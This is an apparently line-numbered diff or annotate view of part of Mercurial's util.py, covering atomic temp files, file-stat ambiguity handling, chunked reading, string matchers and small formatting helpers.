1920 ofp = posixfile(temp, "wb")
1916 for chunk in filechunkiter(ifp):
1921 for chunk in filechunkiter(ifp):
1917 ofp.write(chunk)
1922 ofp.write(chunk)
1918 ifp.close()
1923 ifp.close()
1919 ofp.close()
1924 ofp.close()
1920 except: # re-raises
1925 except: # re-raises
1921 try:
1926 try:
1922 os.unlink(temp)
1927 os.unlink(temp)
1923 except OSError:
1928 except OSError:
1924 pass
1929 pass
1925 raise
1930 raise
1926 return temp
1931 return temp
1927
1932
1928 class filestat(object):
1933 class filestat(object):
1929 """help to exactly detect change of a file
1934 """help to exactly detect change of a file
1930
1935
1931 'stat' attribute is result of 'os.stat()' if specified 'path'
1936 'stat' attribute is result of 'os.stat()' if specified 'path'
1932 exists. Otherwise, it is None. This can avoid preparative
1937 exists. Otherwise, it is None. This can avoid preparative
1933 'exists()' examination on client side of this class.
1938 'exists()' examination on client side of this class.
1934 """
1939 """
1935 def __init__(self, stat):
1940 def __init__(self, stat):
1936 self.stat = stat
1941 self.stat = stat
1937
1942
1938 @classmethod
1943 @classmethod
1939 def frompath(cls, path):
1944 def frompath(cls, path):
1940 try:
1945 try:
1941 stat = os.stat(path)
1946 stat = os.stat(path)
1942 except OSError as err:
1947 except OSError as err:
1943 if err.errno != errno.ENOENT:
1948 if err.errno != errno.ENOENT:
1944 raise
1949 raise
1945 stat = None
1950 stat = None
1946 return cls(stat)
1951 return cls(stat)
1947
1952
1948 @classmethod
1953 @classmethod
1949 def fromfp(cls, fp):
1954 def fromfp(cls, fp):
1950 stat = os.fstat(fp.fileno())
1955 stat = os.fstat(fp.fileno())
1951 return cls(stat)
1956 return cls(stat)
1952
1957
1953 __hash__ = object.__hash__
1958 __hash__ = object.__hash__
1954
1959
1955 def __eq__(self, old):
1960 def __eq__(self, old):
1956 try:
1961 try:
1957 # if ambiguity between stat of new and old file is
1962 # if ambiguity between stat of new and old file is
1958 # avoided, comparison of size, ctime and mtime is enough
1963 # avoided, comparison of size, ctime and mtime is enough
1959 # to exactly detect change of a file regardless of platform
1964 # to exactly detect change of a file regardless of platform
1960 return (self.stat.st_size == old.stat.st_size and
1965 return (self.stat.st_size == old.stat.st_size and
1961 self.stat.st_ctime == old.stat.st_ctime and
1966 self.stat.st_ctime == old.stat.st_ctime and
1962 self.stat.st_mtime == old.stat.st_mtime)
1967 self.stat.st_mtime == old.stat.st_mtime)
1963 except AttributeError:
1968 except AttributeError:
1964 pass
1969 pass
1965 try:
1970 try:
1966 return self.stat is None and old.stat is None
1971 return self.stat is None and old.stat is None
1967 except AttributeError:
1972 except AttributeError:
1968 return False
1973 return False
1969
1974
1970 def isambig(self, old):
1975 def isambig(self, old):
1971 """Examine whether new (= self) stat is ambiguous against old one
1976 """Examine whether new (= self) stat is ambiguous against old one
1972
1977
1973 "S[N]" below means stat of a file at N-th change:
1978 "S[N]" below means stat of a file at N-th change:
1974
1979
1975 - S[n-1].ctime < S[n].ctime: can detect change of a file
1980 - S[n-1].ctime < S[n].ctime: can detect change of a file
1976 - S[n-1].ctime == S[n].ctime
1981 - S[n-1].ctime == S[n].ctime
1977 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1982 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1978 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1983 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1979 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1984 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1980 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1985 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1981
1986
1982 Case (*2) above means that a file was changed twice or more at
1987 Case (*2) above means that a file was changed twice or more at
1983 same time in sec (= S[n-1].ctime), and comparison of timestamp
1988 same time in sec (= S[n-1].ctime), and comparison of timestamp
1984 is ambiguous.
1989 is ambiguous.
1985
1990
1986 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1991 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1987 timestamp is ambiguous".
1992 timestamp is ambiguous".
1988
1993
1989 But advancing mtime only in case (*2) doesn't work as
1994 But advancing mtime only in case (*2) doesn't work as
1990 expected, because naturally advanced S[n].mtime in case (*1)
1995 expected, because naturally advanced S[n].mtime in case (*1)
1991 might be equal to manually advanced S[n-1 or earlier].mtime.
1996 might be equal to manually advanced S[n-1 or earlier].mtime.
1992
1997
1993 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1998 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1994 treated as ambiguous regardless of mtime, to avoid overlooking
1999 treated as ambiguous regardless of mtime, to avoid overlooking
1995 by confliction between such mtime.
2000 by confliction between such mtime.
1996
2001
1997 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2002 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1998 S[n].mtime", even if size of a file isn't changed.
2003 S[n].mtime", even if size of a file isn't changed.
1999 """
2004 """
2000 try:
2005 try:
2001 return (self.stat.st_ctime == old.stat.st_ctime)
2006 return (self.stat.st_ctime == old.stat.st_ctime)
2002 except AttributeError:
2007 except AttributeError:
2003 return False
2008 return False
2004
2009
2005 def avoidambig(self, path, old):
2010 def avoidambig(self, path, old):
2006 """Change file stat of specified path to avoid ambiguity
2011 """Change file stat of specified path to avoid ambiguity
2007
2012
2008 'old' should be previous filestat of 'path'.
2013 'old' should be previous filestat of 'path'.
2009
2014
2010 This skips avoiding ambiguity, if a process doesn't have
2015 This skips avoiding ambiguity, if a process doesn't have
2011 appropriate privileges for 'path'. This returns False in this
2016 appropriate privileges for 'path'. This returns False in this
2012 case.
2017 case.
2013
2018
2014 Otherwise, this returns True, as "ambiguity is avoided".
2019 Otherwise, this returns True, as "ambiguity is avoided".
2015 """
2020 """
2016 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
2021 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
2017 try:
2022 try:
2018 os.utime(path, (advanced, advanced))
2023 os.utime(path, (advanced, advanced))
2019 except OSError as inst:
2024 except OSError as inst:
2020 if inst.errno == errno.EPERM:
2025 if inst.errno == errno.EPERM:
2021 # utime() on the file created by another user causes EPERM,
2026 # utime() on the file created by another user causes EPERM,
2022 # if a process doesn't have appropriate privileges
2027 # if a process doesn't have appropriate privileges
2023 return False
2028 return False
2024 raise
2029 raise
2025 return True
2030 return True
2026
2031
2027 def __ne__(self, other):
2032 def __ne__(self, other):
2028 return not self == other
2033 return not self == other
2029
2034
2030 class atomictempfile(object):
2035 class atomictempfile(object):
2031 '''writable file object that atomically updates a file
2036 '''writable file object that atomically updates a file
2032
2037
2033 All writes will go to a temporary copy of the original file. Call
2038 All writes will go to a temporary copy of the original file. Call
2034 close() when you are done writing, and atomictempfile will rename
2039 close() when you are done writing, and atomictempfile will rename
2035 the temporary copy to the original name, making the changes
2040 the temporary copy to the original name, making the changes
2036 visible. If the object is destroyed without being closed, all your
2041 visible. If the object is destroyed without being closed, all your
2037 writes are discarded.
2042 writes are discarded.
2038
2043
2039 checkambig argument of constructor is used with filestat, and is
2044 checkambig argument of constructor is used with filestat, and is
2040 useful only if target file is guarded by any lock (e.g. repo.lock
2045 useful only if target file is guarded by any lock (e.g. repo.lock
2041 or repo.wlock).
2046 or repo.wlock).
2042 '''
2047 '''
2043 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2048 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2044 self.__name = name # permanent name
2049 self.__name = name # permanent name
2045 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2050 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2046 createmode=createmode)
2051 createmode=createmode)
2047 self._fp = posixfile(self._tempname, mode)
2052 self._fp = posixfile(self._tempname, mode)
2048 self._checkambig = checkambig
2053 self._checkambig = checkambig
2049
2054
2050 # delegated methods
2055 # delegated methods
2051 self.read = self._fp.read
2056 self.read = self._fp.read
2052 self.write = self._fp.write
2057 self.write = self._fp.write
2053 self.seek = self._fp.seek
2058 self.seek = self._fp.seek
2054 self.tell = self._fp.tell
2059 self.tell = self._fp.tell
2055 self.fileno = self._fp.fileno
2060 self.fileno = self._fp.fileno
2056
2061
2057 def close(self):
2062 def close(self):
2058 if not self._fp.closed:
2063 if not self._fp.closed:
2059 self._fp.close()
2064 self._fp.close()
2060 filename = localpath(self.__name)
2065 filename = localpath(self.__name)
2061 oldstat = self._checkambig and filestat.frompath(filename)
2066 oldstat = self._checkambig and filestat.frompath(filename)
2062 if oldstat and oldstat.stat:
2067 if oldstat and oldstat.stat:
2063 rename(self._tempname, filename)
2068 rename(self._tempname, filename)
2064 newstat = filestat.frompath(filename)
2069 newstat = filestat.frompath(filename)
2065 if newstat.isambig(oldstat):
2070 if newstat.isambig(oldstat):
2066 # stat of changed file is ambiguous to original one
2071 # stat of changed file is ambiguous to original one
2067 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
2072 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
2068 os.utime(filename, (advanced, advanced))
2073 os.utime(filename, (advanced, advanced))
2069 else:
2074 else:
2070 rename(self._tempname, filename)
2075 rename(self._tempname, filename)
2071
2076
2072 def discard(self):
2077 def discard(self):
2073 if not self._fp.closed:
2078 if not self._fp.closed:
2074 try:
2079 try:
2075 os.unlink(self._tempname)
2080 os.unlink(self._tempname)
2076 except OSError:
2081 except OSError:
2077 pass
2082 pass
2078 self._fp.close()
2083 self._fp.close()
2079
2084
2080 def __del__(self):
2085 def __del__(self):
2081 if safehasattr(self, '_fp'): # constructor actually did something
2086 if safehasattr(self, '_fp'): # constructor actually did something
2082 self.discard()
2087 self.discard()
2083
2088
2084 def __enter__(self):
2089 def __enter__(self):
2085 return self
2090 return self
2086
2091
2087 def __exit__(self, exctype, excvalue, traceback):
2092 def __exit__(self, exctype, excvalue, traceback):
2088 if exctype is not None:
2093 if exctype is not None:
2089 self.discard()
2094 self.discard()
2090 else:
2095 else:
2091 self.close()
2096 self.close()
2092
2097
2093 def unlinkpath(f, ignoremissing=False):
2098 def unlinkpath(f, ignoremissing=False):
2094 """unlink and remove the directory if it is empty"""
2099 """unlink and remove the directory if it is empty"""
2095 if ignoremissing:
2100 if ignoremissing:
2096 tryunlink(f)
2101 tryunlink(f)
2097 else:
2102 else:
2098 unlink(f)
2103 unlink(f)
2099 # try removing directories that might now be empty
2104 # try removing directories that might now be empty
2100 try:
2105 try:
2101 removedirs(os.path.dirname(f))
2106 removedirs(os.path.dirname(f))
2102 except OSError:
2107 except OSError:
2103 pass
2108 pass
2104
2109
2105 def tryunlink(f):
2110 def tryunlink(f):
2106 """Attempt to remove a file, ignoring ENOENT errors."""
2111 """Attempt to remove a file, ignoring ENOENT errors."""
2107 try:
2112 try:
2108 unlink(f)
2113 unlink(f)
2109 except OSError as e:
2114 except OSError as e:
2110 if e.errno != errno.ENOENT:
2115 if e.errno != errno.ENOENT:
2111 raise
2116 raise
2112
2117
2113 def makedirs(name, mode=None, notindexed=False):
2118 def makedirs(name, mode=None, notindexed=False):
2114 """recursive directory creation with parent mode inheritance
2119 """recursive directory creation with parent mode inheritance
2115
2120
2116 Newly created directories are marked as "not to be indexed by
2121 Newly created directories are marked as "not to be indexed by
2117 the content indexing service", if ``notindexed`` is specified
2122 the content indexing service", if ``notindexed`` is specified
2118 for "write" mode access.
2123 for "write" mode access.
2119 """
2124 """
2120 try:
2125 try:
2121 makedir(name, notindexed)
2126 makedir(name, notindexed)
2122 except OSError as err:
2127 except OSError as err:
2123 if err.errno == errno.EEXIST:
2128 if err.errno == errno.EEXIST:
2124 return
2129 return
2125 if err.errno != errno.ENOENT or not name:
2130 if err.errno != errno.ENOENT or not name:
2126 raise
2131 raise
2127 parent = os.path.dirname(os.path.abspath(name))
2132 parent = os.path.dirname(os.path.abspath(name))
2128 if parent == name:
2133 if parent == name:
2129 raise
2134 raise
2130 makedirs(parent, mode, notindexed)
2135 makedirs(parent, mode, notindexed)
2131 try:
2136 try:
2132 makedir(name, notindexed)
2137 makedir(name, notindexed)
2133 except OSError as err:
2138 except OSError as err:
2134 # Catch EEXIST to handle races
2139 # Catch EEXIST to handle races
2135 if err.errno == errno.EEXIST:
2140 if err.errno == errno.EEXIST:
2136 return
2141 return
2137 raise
2142 raise
2138 if mode is not None:
2143 if mode is not None:
2139 os.chmod(name, mode)
2144 os.chmod(name, mode)
2140
2145
2141 def readfile(path):
2146 def readfile(path):
2142 with open(path, 'rb') as fp:
2147 with open(path, 'rb') as fp:
2143 return fp.read()
2148 return fp.read()
2144
2149
2145 def writefile(path, text):
2150 def writefile(path, text):
2146 with open(path, 'wb') as fp:
2151 with open(path, 'wb') as fp:
2147 fp.write(text)
2152 fp.write(text)
2148
2153
2149 def appendfile(path, text):
2154 def appendfile(path, text):
2150 with open(path, 'ab') as fp:
2155 with open(path, 'ab') as fp:
2151 fp.write(text)
2156 fp.write(text)
2152
2157
2153 class chunkbuffer(object):
2158 class chunkbuffer(object):
2154 """Allow arbitrary sized chunks of data to be efficiently read from an
2159 """Allow arbitrary sized chunks of data to be efficiently read from an
2155 iterator over chunks of arbitrary size."""
2160 iterator over chunks of arbitrary size."""
2156
2161
2157 def __init__(self, in_iter):
2162 def __init__(self, in_iter):
2158 """in_iter is the iterator that's iterating over the input chunks."""
2163 """in_iter is the iterator that's iterating over the input chunks."""
2159 def splitbig(chunks):
2164 def splitbig(chunks):
2160 for chunk in chunks:
2165 for chunk in chunks:
2161 if len(chunk) > 2**20:
2166 if len(chunk) > 2**20:
2162 pos = 0
2167 pos = 0
2163 while pos < len(chunk):
2168 while pos < len(chunk):
2164 end = pos + 2 ** 18
2169 end = pos + 2 ** 18
2165 yield chunk[pos:end]
2170 yield chunk[pos:end]
2166 pos = end
2171 pos = end
2167 else:
2172 else:
2168 yield chunk
2173 yield chunk
2169 self.iter = splitbig(in_iter)
2174 self.iter = splitbig(in_iter)
2170 self._queue = collections.deque()
2175 self._queue = collections.deque()
2171 self._chunkoffset = 0
2176 self._chunkoffset = 0
2172
2177
2173 def read(self, l=None):
2178 def read(self, l=None):
2174 """Read L bytes of data from the iterator of chunks of data.
2179 """Read L bytes of data from the iterator of chunks of data.
2175 Returns less than L bytes if the iterator runs dry.
2180 Returns less than L bytes if the iterator runs dry.
2176
2181
2177 If size parameter is omitted, read everything"""
2182 If size parameter is omitted, read everything"""
2178 if l is None:
2183 if l is None:
2179 return ''.join(self.iter)
2184 return ''.join(self.iter)
2180
2185
2181 left = l
2186 left = l
2182 buf = []
2187 buf = []
2183 queue = self._queue
2188 queue = self._queue
2184 while left > 0:
2189 while left > 0:
2185 # refill the queue
2190 # refill the queue
2186 if not queue:
2191 if not queue:
2187 target = 2**18
2192 target = 2**18
2188 for chunk in self.iter:
2193 for chunk in self.iter:
2189 queue.append(chunk)
2194 queue.append(chunk)
2190 target -= len(chunk)
2195 target -= len(chunk)
2191 if target <= 0:
2196 if target <= 0:
2192 break
2197 break
2193 if not queue:
2198 if not queue:
2194 break
2199 break
2195
2200
2196 # The easy way to do this would be to queue.popleft(), modify the
2201 # The easy way to do this would be to queue.popleft(), modify the
2197 # chunk (if necessary), then queue.appendleft(). However, for cases
2202 # chunk (if necessary), then queue.appendleft(). However, for cases
2198 # where we read partial chunk content, this incurs 2 dequeue
2203 # where we read partial chunk content, this incurs 2 dequeue
2199 # mutations and creates a new str for the remaining chunk in the
2204 # mutations and creates a new str for the remaining chunk in the
2200 # queue. Our code below avoids this overhead.
2205 # queue. Our code below avoids this overhead.
2201
2206
2202 chunk = queue[0]
2207 chunk = queue[0]
2203 chunkl = len(chunk)
2208 chunkl = len(chunk)
2204 offset = self._chunkoffset
2209 offset = self._chunkoffset
2205
2210
2206 # Use full chunk.
2211 # Use full chunk.
2207 if offset == 0 and left >= chunkl:
2212 if offset == 0 and left >= chunkl:
2208 left -= chunkl
2213 left -= chunkl
2209 queue.popleft()
2214 queue.popleft()
2210 buf.append(chunk)
2215 buf.append(chunk)
2211 # self._chunkoffset remains at 0.
2216 # self._chunkoffset remains at 0.
2212 continue
2217 continue
2213
2218
2214 chunkremaining = chunkl - offset
2219 chunkremaining = chunkl - offset
2215
2220
2216 # Use all of unconsumed part of chunk.
2221 # Use all of unconsumed part of chunk.
2217 if left >= chunkremaining:
2222 if left >= chunkremaining:
2218 left -= chunkremaining
2223 left -= chunkremaining
2219 queue.popleft()
2224 queue.popleft()
2220 # offset == 0 is enabled by block above, so this won't merely
2225 # offset == 0 is enabled by block above, so this won't merely
2221 # copy via ``chunk[0:]``.
2226 # copy via ``chunk[0:]``.
2222 buf.append(chunk[offset:])
2227 buf.append(chunk[offset:])
2223 self._chunkoffset = 0
2228 self._chunkoffset = 0
2224
2229
2225 # Partial chunk needed.
2230 # Partial chunk needed.
2226 else:
2231 else:
2227 buf.append(chunk[offset:offset + left])
2232 buf.append(chunk[offset:offset + left])
2228 self._chunkoffset += left
2233 self._chunkoffset += left
2229 left -= chunkremaining
2234 left -= chunkremaining
2230
2235
2231 return ''.join(buf)
2236 return ''.join(buf)
2232
2237
2233 def filechunkiter(f, size=131072, limit=None):
2238 def filechunkiter(f, size=131072, limit=None):
2234 """Create a generator that produces the data in the file size
2239 """Create a generator that produces the data in the file size
2235 (default 131072) bytes at a time, up to optional limit (default is
2240 (default 131072) bytes at a time, up to optional limit (default is
2236 to read all data). Chunks may be less than size bytes if the
2241 to read all data). Chunks may be less than size bytes if the
2237 chunk is the last chunk in the file, or the file is a socket or
2242 chunk is the last chunk in the file, or the file is a socket or
2238 some other type of file that sometimes reads less data than is
2243 some other type of file that sometimes reads less data than is
2239 requested."""
2244 requested."""
2240 assert size >= 0
2245 assert size >= 0
2241 assert limit is None or limit >= 0
2246 assert limit is None or limit >= 0
2242 while True:
2247 while True:
2243 if limit is None:
2248 if limit is None:
2244 nbytes = size
2249 nbytes = size
2245 else:
2250 else:
2246 nbytes = min(limit, size)
2251 nbytes = min(limit, size)
2247 s = nbytes and f.read(nbytes)
2252 s = nbytes and f.read(nbytes)
2248 if not s:
2253 if not s:
2249 break
2254 break
2250 if limit:
2255 if limit:
2251 limit -= len(s)
2256 limit -= len(s)
2252 yield s
2257 yield s
2253
2258
2254 class cappedreader(object):
2259 class cappedreader(object):
2255 """A file object proxy that allows reading up to N bytes.
2260 """A file object proxy that allows reading up to N bytes.
2256
2261
2257 Given a source file object, instances of this type allow reading up to
2262 Given a source file object, instances of this type allow reading up to
2258 N bytes from that source file object. Attempts to read past the allowed
2263 N bytes from that source file object. Attempts to read past the allowed
2259 limit are treated as EOF.
2264 limit are treated as EOF.
2260
2265
2261 It is assumed that I/O is not performed on the original file object
2266 It is assumed that I/O is not performed on the original file object
2262 in addition to I/O that is performed by this instance. If there is,
2267 in addition to I/O that is performed by this instance. If there is,
2263 state tracking will get out of sync and unexpected results will ensue.
2268 state tracking will get out of sync and unexpected results will ensue.
2264 """
2269 """
2265 def __init__(self, fh, limit):
2270 def __init__(self, fh, limit):
2266 """Allow reading up to <limit> bytes from <fh>."""
2271 """Allow reading up to <limit> bytes from <fh>."""
2267 self._fh = fh
2272 self._fh = fh
2268 self._left = limit
2273 self._left = limit
2269
2274
2270 def read(self, n=-1):
2275 def read(self, n=-1):
2271 if not self._left:
2276 if not self._left:
2272 return b''
2277 return b''
2273
2278
2274 if n < 0:
2279 if n < 0:
2275 n = self._left
2280 n = self._left
2276
2281
2277 data = self._fh.read(min(n, self._left))
2282 data = self._fh.read(min(n, self._left))
2278 self._left -= len(data)
2283 self._left -= len(data)
2279 assert self._left >= 0
2284 assert self._left >= 0
2280
2285
2281 return data
2286 return data
2282
2287
2283 def stringmatcher(pattern, casesensitive=True):
2288 def stringmatcher(pattern, casesensitive=True):
2284 """
2289 """
2285 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2290 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2286 returns the matcher name, pattern, and matcher function.
2291 returns the matcher name, pattern, and matcher function.
2287 missing or unknown prefixes are treated as literal matches.
2292 missing or unknown prefixes are treated as literal matches.
2288
2293
2289 helper for tests:
2294 helper for tests:
2290 >>> def test(pattern, *tests):
2295 >>> def test(pattern, *tests):
2291 ... kind, pattern, matcher = stringmatcher(pattern)
2296 ... kind, pattern, matcher = stringmatcher(pattern)
2292 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2297 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2293 >>> def itest(pattern, *tests):
2298 >>> def itest(pattern, *tests):
2294 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2299 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2295 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2300 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2296
2301
2297 exact matching (no prefix):
2302 exact matching (no prefix):
2298 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2303 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2299 ('literal', 'abcdefg', [False, False, True])
2304 ('literal', 'abcdefg', [False, False, True])
2300
2305
2301 regex matching ('re:' prefix)
2306 regex matching ('re:' prefix)
2302 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2307 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2303 ('re', 'a.+b', [False, False, True])
2308 ('re', 'a.+b', [False, False, True])
2304
2309
2305 force exact matches ('literal:' prefix)
2310 force exact matches ('literal:' prefix)
2306 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2311 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2307 ('literal', 're:foobar', [False, True])
2312 ('literal', 're:foobar', [False, True])
2308
2313
2309 unknown prefixes are ignored and treated as literals
2314 unknown prefixes are ignored and treated as literals
2310 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2315 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2311 ('literal', 'foo:bar', [False, False, True])
2316 ('literal', 'foo:bar', [False, False, True])
2312
2317
2313 case insensitive regex matches
2318 case insensitive regex matches
2314 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2319 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2315 ('re', 'A.+b', [False, False, True])
2320 ('re', 'A.+b', [False, False, True])
2316
2321
2317 case insensitive literal matches
2322 case insensitive literal matches
2318 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2323 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2319 ('literal', 'ABCDEFG', [False, False, True])
2324 ('literal', 'ABCDEFG', [False, False, True])
2320 """
2325 """
2321 if pattern.startswith('re:'):
2326 if pattern.startswith('re:'):
2322 pattern = pattern[3:]
2327 pattern = pattern[3:]
2323 try:
2328 try:
2324 flags = 0
2329 flags = 0
2325 if not casesensitive:
2330 if not casesensitive:
2326 flags = remod.I
2331 flags = remod.I
2327 regex = remod.compile(pattern, flags)
2332 regex = remod.compile(pattern, flags)
2328 except remod.error as e:
2333 except remod.error as e:
2329 raise error.ParseError(_('invalid regular expression: %s')
2334 raise error.ParseError(_('invalid regular expression: %s')
2330 % e)
2335 % e)
2331 return 're', pattern, regex.search
2336 return 're', pattern, regex.search
2332 elif pattern.startswith('literal:'):
2337 elif pattern.startswith('literal:'):
2333 pattern = pattern[8:]
2338 pattern = pattern[8:]
2334
2339
2335 match = pattern.__eq__
2340 match = pattern.__eq__
2336
2341
2337 if not casesensitive:
2342 if not casesensitive:
2338 ipat = encoding.lower(pattern)
2343 ipat = encoding.lower(pattern)
2339 match = lambda s: ipat == encoding.lower(s)
2344 match = lambda s: ipat == encoding.lower(s)
2340 return 'literal', pattern, match
2345 return 'literal', pattern, match
2341
2346
2342 def shortuser(user):
2347 def shortuser(user):
2343 """Return a short representation of a user name or email address."""
2348 """Return a short representation of a user name or email address."""
2344 f = user.find('@')
2349 f = user.find('@')
2345 if f >= 0:
2350 if f >= 0:
2346 user = user[:f]
2351 user = user[:f]
2347 f = user.find('<')
2352 f = user.find('<')
2348 if f >= 0:
2353 if f >= 0:
2349 user = user[f + 1:]
2354 user = user[f + 1:]
2350 f = user.find(' ')
2355 f = user.find(' ')
2351 if f >= 0:
2356 if f >= 0:
2352 user = user[:f]
2357 user = user[:f]
2353 f = user.find('.')
2358 f = user.find('.')
2354 if f >= 0:
2359 if f >= 0:
2355 user = user[:f]
2360 user = user[:f]
2356 return user
2361 return user
2357
2362
2358 def emailuser(user):
2363 def emailuser(user):
2359 """Return the user portion of an email address."""
2364 """Return the user portion of an email address."""
2360 f = user.find('@')
2365 f = user.find('@')
2361 if f >= 0:
2366 if f >= 0:
2362 user = user[:f]
2367 user = user[:f]
2363 f = user.find('<')
2368 f = user.find('<')
2364 if f >= 0:
2369 if f >= 0:
2365 user = user[f + 1:]
2370 user = user[f + 1:]
2366 return user
2371 return user
2367
2372
2368 def email(author):
2373 def email(author):
2369 '''get email of author.'''
2374 '''get email of author.'''
2370 r = author.find('>')
2375 r = author.find('>')
2371 if r == -1:
2376 if r == -1:
2372 r = None
2377 r = None
2373 return author[author.find('<') + 1:r]
2378 return author[author.find('<') + 1:r]
2374
2379
2375 def ellipsis(text, maxlength=400):
2380 def ellipsis(text, maxlength=400):
2376 """Trim string to at most maxlength (default: 400) columns in display."""
2381 """Trim string to at most maxlength (default: 400) columns in display."""
2377 return encoding.trim(text, maxlength, ellipsis='...')
2382 return encoding.trim(text, maxlength, ellipsis='...')
2378
2383
2379 def unitcountfn(*unittable):
2384 def unitcountfn(*unittable):
2380 '''return a function that renders a readable count of some quantity'''
2385 '''return a function that renders a readable count of some quantity'''
2381
2386
2382 def go(count):
2387 def go(count):
2383 for multiplier, divisor, format in unittable:
2388 for multiplier, divisor, format in unittable:
2384 if abs(count) >= divisor * multiplier:
2389 if abs(count) >= divisor * multiplier:
2385 return format % (count / float(divisor))
2390 return format % (count / float(divisor))
2386 return unittable[-1][2] % count
2391 return unittable[-1][2] % count
2387
2392
2388 return go
2393 return go
2389
2394
2390 def processlinerange(fromline, toline):
2395 def processlinerange(fromline, toline):
2391 """Check that linerange <fromline>:<toline> makes sense and return a
2396 """Check that linerange <fromline>:<toline> makes sense and return a
2392 0-based range.
2397 0-based range.
2393
2398
2394 >>> processlinerange(10, 20)
2399 >>> processlinerange(10, 20)
2395 (9, 20)
2400 (9, 20)
2396 >>> processlinerange(2, 1)
2401 >>> processlinerange(2, 1)
2397 Traceback (most recent call last):
2402 Traceback (most recent call last):
2398 ...
2403 ...
2399 ParseError: line range must be positive
2404 ParseError: line range must be positive
2400 >>> processlinerange(0, 5)
2405 >>> processlinerange(0, 5)
2401 Traceback (most recent call last):
2406 Traceback (most recent call last):
2402 ...
2407 ...
2403 ParseError: fromline must be strictly positive
2408 ParseError: fromline must be strictly positive
2404 """
2409 """
2405 if toline - fromline < 0:
2410 if toline - fromline < 0:
2406 raise error.ParseError(_("line range must be positive"))
2411 raise error.ParseError(_("line range must be positive"))
2407 if fromline < 1:
2412 if fromline < 1:
2408 raise error.ParseError(_("fromline must be strictly positive"))
2413 raise error.ParseError(_("fromline must be strictly positive"))
2409 return fromline - 1, toline
2414 return fromline - 1, toline
2410
2415
2411 bytecount = unitcountfn(
2416 bytecount = unitcountfn(
2412 (100, 1 << 30, _('%.0f GB')),
2417 (100, 1 << 30, _('%.0f GB')),
2413 (10, 1 << 30, _('%.1f GB')),
2418 (10, 1 << 30, _('%.1f GB')),
2414 (1, 1 << 30, _('%.2f GB')),
2419 (1, 1 << 30, _('%.2f GB')),
2415 (100, 1 << 20, _('%.0f MB')),
2420 (100, 1 << 20, _('%.0f MB')),
2416 (10, 1 << 20, _('%.1f MB')),
2421 (10, 1 << 20, _('%.1f MB')),
2417 (1, 1 << 20, _('%.2f MB')),
2422 (1, 1 << 20, _('%.2f MB')),
2418 (100, 1 << 10, _('%.0f KB')),
2423 (100, 1 << 10, _('%.0f KB')),
2419 (10, 1 << 10, _('%.1f KB')),
2424 (10, 1 << 10, _('%.1f KB')),
2420 (1, 1 << 10, _('%.2f KB')),
2425 (1, 1 << 10, _('%.2f KB')),
2421 (1, 1, _('%.0f bytes')),
2426 (1, 1, _('%.0f bytes')),
2422 )
2427 )
2423
2428
2424 # Matches a single EOL which can either be a CRLF where repeated CR
2429 # Matches a single EOL which can either be a CRLF where repeated CR
2425 # are removed or a LF. We do not care about old Macintosh files, so a
2430 # are removed or a LF. We do not care about old Macintosh files, so a
2426 # stray CR is an error.
2431 # stray CR is an error.
2427 _eolre = remod.compile(br'\r*\n')
2432 _eolre = remod.compile(br'\r*\n')
2428
2433
2429 def tolf(s):
2434 def tolf(s):
2430 return _eolre.sub('\n', s)
2435 return _eolre.sub('\n', s)
2431
2436
2432 def tocrlf(s):
2437 def tocrlf(s):
2433 return _eolre.sub('\r\n', s)
2438 return _eolre.sub('\r\n', s)
2434
2439
2435 if pycompat.oslinesep == '\r\n':
2440 if pycompat.oslinesep == '\r\n':
2436 tonativeeol = tocrlf
2441 tonativeeol = tocrlf
2437 fromnativeeol = tolf
2442 fromnativeeol = tolf
2438 else:
2443 else:
2439 tonativeeol = pycompat.identity
2444 tonativeeol = pycompat.identity
2440 fromnativeeol = pycompat.identity
2445 fromnativeeol = pycompat.identity
2441
2446
2442 def escapestr(s):
2447 def escapestr(s):
2443 # call underlying function of s.encode('string_escape') directly for
2448 # call underlying function of s.encode('string_escape') directly for
2444 # Python 3 compatibility
2449 # Python 3 compatibility
2445 return codecs.escape_encode(s)[0]
2450 return codecs.escape_encode(s)[0]
2446
2451
2447 def unescapestr(s):
2452 def unescapestr(s):
2448 return codecs.escape_decode(s)[0]
